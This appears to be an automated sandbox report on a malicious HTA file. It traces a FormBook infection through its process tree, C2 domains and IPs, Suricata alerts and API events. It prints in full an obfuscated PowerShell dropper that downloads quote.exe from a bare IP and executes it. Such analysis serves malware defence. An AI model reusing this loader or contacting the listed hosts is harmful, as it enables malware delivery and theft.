Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 5, 2024, 9:13 a.m.	June 5, 2024, 9:16 a.m.

Size	10.8KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`cd5915bac2ea167ddb7bcc2ae9ceab78`
SHA256	`0a377c75cd4db2defd6236cac3bf34dbfafdc5966aca8f8c2273ced42509f1f7`
CRC32	`B19F5ED5`
ssdeep	`192:IzTWjz8azPTz/6PmyMSrPq8/TIsErATDgyYB:p`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Quote.hta
1984
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
  2100
  - quote.exe "C:\Users\test22\AppData\Local\Temp\quote.exe"
    2272
netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
2424
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2860
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
www.antonio-vivaldi.mobi	A 46.30.213.191	46.30.213.191
www.goldenjade-travel.com	A 116.50.37.244	116.50.37.244
www.3xfootball.com	A 154.215.72.110	154.215.72.110
www.kasegitai.tokyo	A 202.172.28.202	202.172.28.202
www.magmadokum.com	CNAME natroredirect.natrocdn.com CNAME redirect.natrocdn.com A 85.159.66.93	85.159.66.93
www.liangyuen528.com
www.techchains.info	A 66.29.149.46	66.29.149.46
www.rssnewscast.com	A 91.195.240.94	91.195.240.94
www.sqlite.org	A 45.33.6.223	45.33.6.223

IP Address	Status	Action
116.50.37.244	Active	Moloch
154.215.72.110	Active	Moloch
164.124.101.2	Active	Moloch
198.23.201.89	Active	Moloch
202.172.28.202	Active	Moloch
45.33.6.223	Active	Moloch
46.30.213.191	Active	Moloch
66.29.149.46	Active	Moloch
85.159.66.93	Active	Moloch
91.195.240.94	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49164 -> 198.23.201.89:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 198.23.201.89:80 -> 192.168.56.103:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 202.172.28.202:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 154.215.72.110:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 116.50.37.244:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49187 -> 85.159.66.93:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49184 -> 46.30.213.191:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49190 -> 91.195.240.94:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected
TCP 192.168.56.103:49193 -> 66.29.149.46:80	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 5, 2024, 9:13 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 5, 2024, 9:13 a.m.			0	0

Command line console output was observed (26 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: At line:1 char:778 console_handle: 0x00000053	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: + function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes( console_handle: 0x0000005f	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: $ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqy console_handle: 0x0000006b	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: EOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){run console_handle: 0x00000077	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: dll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @ console_handle: 0x00000083	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: (78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestri console_handle: 0x0000008f	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: cted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @ console_handle: 0x0000009b	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: (78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Sta console_handle: 0x000000a7	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: rt-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJ console_handle: 0x000000b3	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: tgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,789 console_handle: 0x000000bf	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: 24,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]:: <<<< Secur console_handle: 0x000000cb	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: ityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.Down console_handle: 0x000000d7	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: loadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($o console_handle: 0x000000e3	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: nRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $ console_handle: 0x000000ef	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveC console_handle: 0x000000fb	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: dbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJ console_handle: 0x00000107	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: BxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LM console_handle: 0x00000113	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: AIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(7 console_handle: 0x0000011f	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: 39,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $ console_handle: 0x00000143	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ; console_handle: 0x0000014f	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000015b	1	1
WriteConsoleW June 5, 2024, 9:13 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x00000167	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbbf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb4b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbd38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bb938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbfb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bc1b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 5, 2024, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005bbc38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 5, 2024, 9:13 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://198.23.201.89/warm/quote.exe

Performs some HTTP requests (16 events)

request	GET http://198.23.201.89/warm/quote.exe
request	POST http://www.3xfootball.com/fo8o/
request	GET http://www.3xfootball.com/fo8o/?oRtj25=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&lR=TJtS0SjWYL-G11_
request	GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
request	POST http://www.kasegitai.tokyo/fo8o/
request	GET http://www.kasegitai.tokyo/fo8o/?oRtj25=0LNqIGaAWMhMIMLOr1FzuAu+QFTp+Isr9lFre+yu3/9GvRNYi1uHghhDsQ/pqDAQ+wkUrFUIurr7TLyDqzId9vCn3h40hICDSYZjejM1bTxHHnFMxARLyMCZMUhSp6GMEGHL0HI=&lR=TJtS0SjWYL-G11_
request	POST http://www.goldenjade-travel.com/fo8o/
request	GET http://www.goldenjade-travel.com/fo8o/?oRtj25=LFKqyrcu7g1NCa8bIVnmntQ0zrEKrQSprIMLtaWgKJ9bBKQr4dsn0J7ZoYUgIJ+R6Sel8OhXEcHhC7LyM9bkgjIIu2U6i6kbe5asCJcEX28JEcHJIWfCjODnuc7OiogdzaMrHf8=&lR=TJtS0SjWYL-G11_
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	GET http://www.antonio-vivaldi.mobi/fo8o/?oRtj25=PTl5gU/3CD/Xhg5KAVLGoeqWcilDUK5FTZuVmm6gfrwSjnBrSraU5xyBGUoA1k9xMbAGIU7PLJqf1PTsNd74L3d6+NgzbyGN2pTsiSyIeh1B8hC/nFfIu9UZrk9ku3J39HvVUu8=&lR=TJtS0SjWYL-G11_
request	POST http://www.magmadokum.com/fo8o/
request	GET http://www.magmadokum.com/fo8o/?oRtj25=qL3nKp+YSjoaTomnND+fiETGbzpIgkHGMW8DXsDTZ4AADrD7Wpn1kxM1jYW2/C2WhyBblBh5NUSWrO5bZjyCcVkJYbxxq5QITB2h2xAyEikjbcoqZSmDOCeIE8A+B7hyBKIW8mw=&lR=TJtS0SjWYL-G11_
request	POST http://www.rssnewscast.com/fo8o/
request	GET http://www.rssnewscast.com/fo8o/?oRtj25=x3jV/ECx7FuzXOI+6CNaISj98UIEn47HyCIVaqWvGMMqpfz0YC5wNp/pxM1zEFNKv4nPeGfT8/lZrDaJmccs4488pD+gaHK32CxgTEs5a2vdBlM4hQBa8nlaMF5vesFSU19kJNk=&lR=TJtS0SjWYL-G11_
request	POST http://www.techchains.info/fo8o/
request	GET http://www.techchains.info/fo8o/?oRtj25=vefd0teQh+kbruh+iKW53cdcsQD4oFyRDgCUoL90YCYLczV+Hcc/VZ2eVbboy/u5EgiS3CnxBclKZHyNJ/4ALr08/A/SWk5lVGufGp2P4fG4f3GonqE4cYuaa0/JNC0RZIlRWrU=&lR=TJtS0SjWYL-G11_

Sends data using the HTTP POST Method (7 events)

request	POST http://www.3xfootball.com/fo8o/
request	POST http://www.kasegitai.tokyo/fo8o/
request	POST http://www.goldenjade-travel.com/fo8o/
request	POST http://www.antonio-vivaldi.mobi/fo8o/
request	POST http://www.magmadokum.com/fo8o/
request	POST http://www.rssnewscast.com/fo8o/
request	POST http://www.techchains.info/fo8o/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02741000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 5, 2024, 9:13 a.m.	process_identifier: 2100 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
